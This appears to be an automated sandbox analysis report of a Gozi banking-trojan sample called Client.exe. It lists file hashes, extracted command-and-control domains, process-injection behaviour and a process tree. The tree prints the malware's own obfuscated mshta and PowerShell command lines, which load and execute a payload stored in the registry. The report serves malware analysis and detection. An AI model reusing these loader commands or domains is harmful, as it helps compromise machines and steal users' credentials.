Analysis
max time kernel: 182s
max time network: 177s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11-10-2023 09:07

Static task: static1
Behavioral task: behavioral1
Sample: Client.exe
Resource: win7-20230831-en

General
Target: Client.exe
Size: 406KB
MD5: 2f5a00394c3568e91f6302dc6c8b196c
SHA1: 116f6ba99db4592f1ab5ccb1a734fdc5a52021bc
SHA256: 3a1211935c4bd148eb6fb23c40d4806ee5a488b09bd61b3c0d15a47dbbfe64fd
SHA512: a30efa790e3ad7af4e574ef0bf359b6a91691947cf434ddcd30a228af29dea0a9b5c1daff050ecae6e88912e8f04813f1df9680e6fc896cee63e36476e4bbe36
SSDEEP: 12288:l1HmKzwKhZhZsuyOtldw5hbu5Ty7pySxN1t:bHGKhZzLQ5Wn6H

Malware Config

Extracted: gozi

Extracted: gozi
5050
netsecurez.com
whofoxy.com
mimemoa.com
ntcgo.com
base_path: /jerry/
build: 250260
exe_type: loader
extension: .bob
server_id: 50

Extracted: gozi
5050
fotexion.com
base_path: /pictures/
build: 250260
exe_type: worker
extension: .bob
server_id: 50

Signatures

Dave packer (1 IoCs)
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
resource | yara_rule
behavioral2/memory/4576-1-0x0000000001340000-0x000000000134C000-memory.dmp | dave

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation | mshta.exe

Suspicious use of SetThreadContext (8 IoCs)
Processes: Client.exe, control.exe, rundll32.exe, Explorer.EXE
description | pid | process | target process
PID 4576 set thread context of 3976 | 4576 | Client.exe | control.exe
PID 3976 set thread context of 3136 | 3976 | control.exe | Explorer.EXE
PID 3976 set thread context of 2392 | 3976 | control.exe | rundll32.exe
PID 2392 set thread context of 3136 | 2392 | rundll32.exe | Explorer.EXE
PID 3136 set thread context of 3740 | 3136 | Explorer.EXE | RuntimeBroker.exe
PID 3136 set thread context of 4004 | 3136 | Explorer.EXE | RuntimeBroker.exe
PID 3136 set thread context of 2116 | 3136 | Explorer.EXE | RuntimeBroker.exe
PID 3136 set thread context of 1016 | 3136 | Explorer.EXE | cmd.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: Client.exe, powershell.exe, Explorer.EXE
pid | process
4576 | Client.exe
4112 | powershell.exe
3136 | Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes: Explorer.EXE
pid | process
3136 | Explorer.EXE

Suspicious behavior: MapViewOfSection (8 IoCs)
Processes: Client.exe, control.exe, rundll32.exe, Explorer.EXE
pid | process
4576 | Client.exe
3976 | control.exe
2392 | rundll32.exe
3136 | Explorer.EXE

Suspicious use of AdjustPrivilegeToken (14 IoCs)
Processes: powershell.exe, Explorer.EXE, RuntimeBroker.exe
description | pid | process
Token: SeDebugPrivilege | 4112 | powershell.exe
Token: SeShutdownPrivilege | 3136 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 3136 | Explorer.EXE
Token: SeShutdownPrivilege | 3740 | RuntimeBroker.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes: Explorer.EXE
pid | process
3136 | Explorer.EXE

Suspicious use of UnmapMainImage (1 IoCs)
Processes: Explorer.EXE
pid | process
3136 | Explorer.EXE

Suspicious use of WriteProcessMemory (46 IoCs)
Processes: Client.exe, mshta.exe, control.exe, rundll32.exe, Explorer.EXE, powershell.exe, csc.exe, csc.exe
description | pid | process | target process
PID 4576 wrote to memory of 3976 | 4576 | Client.exe | control.exe
PID 4776 wrote to memory of 4112 | 4776 | mshta.exe | powershell.exe
PID 3976 wrote to memory of 3136 | 3976 | control.exe | Explorer.EXE
PID 3976 wrote to memory of 2392 | 3976 | control.exe | rundll32.exe
PID 2392 wrote to memory of 3136 | 2392 | rundll32.exe | Explorer.EXE
PID 3136 wrote to memory of 3740 | 3136 | Explorer.EXE | RuntimeBroker.exe
PID 3136 wrote to memory of 4004 | 3136 | Explorer.EXE | RuntimeBroker.exe
PID 3136 wrote to memory of 2116 | 3136 | Explorer.EXE | RuntimeBroker.exe
PID 4112 wrote to memory of 456 | 4112 | powershell.exe | csc.exe
PID 3136 wrote to memory of 1016 | 3136 | Explorer.EXE | cmd.exe
PID 456 wrote to memory of 4616 | 456 | csc.exe | cvtres.exe
PID 4112 wrote to memory of 500 | 4112 | powershell.exe | csc.exe
PID 500 wrote to memory of 4720 | 500 | csc.exe | cvtres.exe

Processes
C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of UnmapMainImage
  - Suspicious use of WriteProcessMemory
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\control.exe -h
      - Suspicious use of SetThreadContext
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of WriteProcessMemory
      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>C6an='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(C6an).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name spbjcmn -value gp; new-alias -name ugokyvk -value iex; ugokyvk ([System.Text.Encoding]::ASCII.GetString((spbjcmn "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wcwewm4x\wcwewm4x.cmdline"
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1469.tmp" "c:\Users\Admin\AppData\Local\Temp\wcwewm4x\CSCCFB8D7E354FB44EE86AA3CE618854048.TMP"
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4v1l0yo4\4v1l0yo4.cmdline"
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES16F9.tmp" "c:\Users\Admin\AppData\Local\Temp\4v1l0yo4\CSCD7776EEEDCD044C2AF49A07BCED3C0CC.TMP"
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\4v1l0yo4\4v1l0yo4.dll (Filesize: 3KB)
- C:\Users\Admin\AppData\Local\Temp\RES1469.tmp (Filesize: 1KB)
- C:\Users\Admin\AppData\Local\Temp\RES16F9.tmp (Filesize: 1KB)
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4txaqru4.5uj.ps1 (Filesize: 60B)
- C:\Users\Admin\AppData\Local\Temp\wcwewm4x\wcwewm4x.dll (Filesize: 3KB)
- \??\c:\Users\Admin\AppData\Local\Temp\4v1l0yo4\4v1l0yo4.0.cs (Filesize: 406B)
- \??\c:\Users\Admin\AppData\Local\Temp\4v1l0yo4\4v1l0yo4.cmdline (Filesize: 369B)
- \??\c:\Users\Admin\AppData\Local\Temp\4v1l0yo4\CSCD7776EEEDCD044C2AF49A07BCED3C0CC.TMP (Filesize: 652B)
- \??\c:\Users\Admin\AppData\Local\Temp\wcwewm4x\CSCCFB8D7E354FB44EE86AA3CE618854048.TMP (Filesize: 652B)
- \??\c:\Users\Admin\AppData\Local\Temp\wcwewm4x\wcwewm4x.0.cs (Filesize: 405B)
- \??\c:\Users\Admin\AppData\Local\Temp\wcwewm4x\wcwewm4x.cmdline (Filesize: 369B)